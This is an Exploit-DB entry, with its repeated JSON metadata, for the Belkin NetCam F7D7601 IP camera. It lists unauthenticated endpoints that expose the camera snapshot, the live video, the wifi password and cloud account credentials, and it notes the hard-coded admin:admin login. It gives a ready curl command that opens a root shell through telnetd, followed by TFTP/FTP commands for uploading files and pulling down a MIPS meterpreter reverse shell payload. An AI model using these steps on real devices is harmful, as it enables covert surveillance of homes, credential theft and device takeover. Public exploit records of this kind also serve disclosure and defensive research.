ID EDB-ID:42331
Type exploitdb
Reporter Exploit-DB
Modified 2017-07-17T00:00:00
Description
Belkin NetCam F7D7601 - Multiple Vulnerabilities. Remote exploit for Hardware platform
# Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution
# Date: 17/07/17
# Exploit Author: Wadeek
# Vendor Homepage: http://www.belkin.com/
# Tested on: Belkin NetCam F7D7601 (WeMo_NetCam_WW_2.00.10684.PVT)
================================================
##
UnsetupMode == [0]
Hard-coded password admin:admin - SetupMode == [1]
##
================================================
##
[1] BusyBox version & Linux version & gcc version >> GET http://[IP]:80/goform/syslog
[1] System version >> GET http://[IP]:80/goform/getSystemSettings?systemModel&systemVersion&brandName&longBrandName
[1] Camera snapshot >> GET http://[IP]:80/goform/snapshot
[1] Camera streaming >> GET http://[IP]:80/goform/video
[101] Disclosure username and password on netcam.belkin.com >> GET http://[IP]:80/goform/apcamMode
[101] Disclosure wifi password >> GET http://[IP]:80/apcam/for-android/aplist.asp
[0] Firmware version >> GET http://[IP]:[49150..49159]/setup.xml
##
================================================
#||
================================================
[0] Network Fingerprinting
##
80/tcp open http
HTTP/1.1 404 Site or Page Not Found
Server: Camera Web Server
<title>Document Error: Site or Page Not Found</title>
<h2>Access Error: Site or Page Not Found</h2>
<p>Page Not Found</p>
&&
[49150..49159]/tcp open UPnP
HTTP/0.0 400 Bad Request
SERVER: Unspecified, UPnP/1.0, Unspecified
<h1>400 Bad Request</h1>
##
================================================
#||
================================================
[1] Wireless Fingerprinting
##
ESSID:"NetCamXXXX"
Encryption key:off
Address: C0:56:27
##
[1] Network Fingerprinting
##
80/tcp open http
HTTP/1.1 401 Unauthorized
Server: Camera Web Server
WWW-Authenticate: Basic realm="Camera Web Server"
<title>Document Error: Unauthorized</title>
<h2>Access Error: Unauthorized</h2>
<p>Access to this document requires a User ID</p>
##
[1] Remote Command Execution
/!/ !/
:~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh' -H 'Authorization: Basic YWRtaW46YWRtaW4='
:~$ telnet [IP] 23
upload by FTP # ftpput -v -u [USERNAME] -p [PASSWORD] -P [PORT] [IP] [REMOTE-FILENAME] [LOCAL-FILENAME]
upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
/!/ !/
================================================
{"id": "EDB-ID:42331", "bulletinFamily": "exploit", "title": "Belkin NetCam F7D7601 - Multiple Vulnerabilities", "description": "Belkin NetCam F7D7601 - Multiple Vulnerabilities. Remote exploit for Hardware platform", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/42331/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "type": "exploitdb", "lastseen": "2017-07-18T11:41:48", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "f5a9643177eeb20651037a2fc05f32e4"}, {"key": "href", "hash": "e081bafe5c6acf7370095ed1a31ac227"}, {"key": "modified", "hash": "0b1120cd0b8a3af6d2e08104fa0e9872"}, {"key": "osvdbidlist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "published", "hash": "0b1120cd0b8a3af6d2e08104fa0e9872"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "sourceData", "hash": "3ead172faa31fe60908302c6e600ce71"}, {"key": "sourceHref", "hash": "008e7608af27a45e75aacf0f616b6400"}, {"key": "title", "hash": "4a8e0842eeb649b90f0352daee77a1ea"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "hash": "0ab696e9c90fb6e4c289ac7dd8b6e228ff58efbeb2a3034c573b6416470def5f", "viewCount": 6, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "sourceHref": "https://www.exploit-db.com/download/42331/", "sourceData": "# Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution\r\n# Date: 17/07/17\r\n# Exploit Author: Wadeek\r\n# Vendor Homepage: http://www.belkin.com/\r\n# Tested on: Belkin NetCam F7D7601 (WeMo_NetCam_WW_2.00.10684.PVT)\r\n================================================\r\n##\r\nUnsetupMode == [0]\r\nHard-coded password admin:admin - SetupMode == [1]\r\n##\r\n================================================\r\n##\r\n[1] BusyBox version & Linux version & gcc version >> GET http://[IP]:80/goform/syslog\r\n[1] System version >> GET http://[IP]:80/goform/getSystemSettings?systemModel&systemVersion&brandName&longBrandName\r\n[1] Camera snapshot >> GET http://[IP]:80/goform/snapshot\r\n[1] Camera streaming >> GET http://[IP]:80/goform/video\r\n[101] Disclosure username and password on netcam.belkin.com >> GET http://[IP]:80/goform/apcamMode\r\n[101] Disclosure wifi password >> GET http://[IP]:80/apcam/for-android/aplist.asp\r\n[0] Firmware version >> GET http://[IP]:[49150..49159]/setup.xml\r\n##\r\n================================================\r\n#||\r\n================================================\r\n[0] Network Fingerprinting\r\n##\r\n80/tcp open http\r\nHTTP/1.1 404 Site or Page Not Found\r\nServer: Camera Web Server\r\n<title>Document Error: Site or Page Not Found</title>\r\n<h2>Access Error: Site or Page Not Found</h2>\r\n<p>Page Not Found</p>\r\n&&\r\n[49150..49159]/tcp open UPnP\r\nHTTP/0.0 400 Bad Request\r\nSERVER: Unspecified, UPnP/1.0, Unspecified\r\n<h1>400 Bad Request</h1>\r\n##\r\n================================================\r\n#||\r\n================================================\r\n[1] Wireless Fingerprinting\r\n##\r\nESSID:\"NetCamXXXX\"\r\nEncryption key:off\r\nAddress: C0:56:27\r\n##\r\n[1] Network Fingerprinting\r\n##\r\n80/tcp open http\r\nHTTP/1.1 401 Unauthorized\r\nServer: Camera Web Server\r\nWWW-Authenticate: Basic realm=\"Camera Web Server\"\r\n<title>Document Error: Unauthorized</title>\r\n<h2>Access Error: Unauthorized</h2>\r\n<p>Access to this document requires a User ID</p>\r\n##\r\n[1] Remote Command Execution\r\n/!/ !/\r\n:~$ curl 'http://[IP]/goform/SystemCommand?command=telnetd%20-l%20/bin/sh' -H 'Authorization: Basic YWRtaW46YWRtaW4='\r\n:~$ telnet [IP] 23\r\nupload by FTP # ftpput -v -u [USERNAME] -p [PASSWORD] -P [PORT] [IP] [REMOTE-FILENAME] [LOCAL-FILENAME]\r\nupload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]\r\ndownload by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]\r\n/!/ !/\r\n================================================", "osvdbidlist": []}
{"result": {}}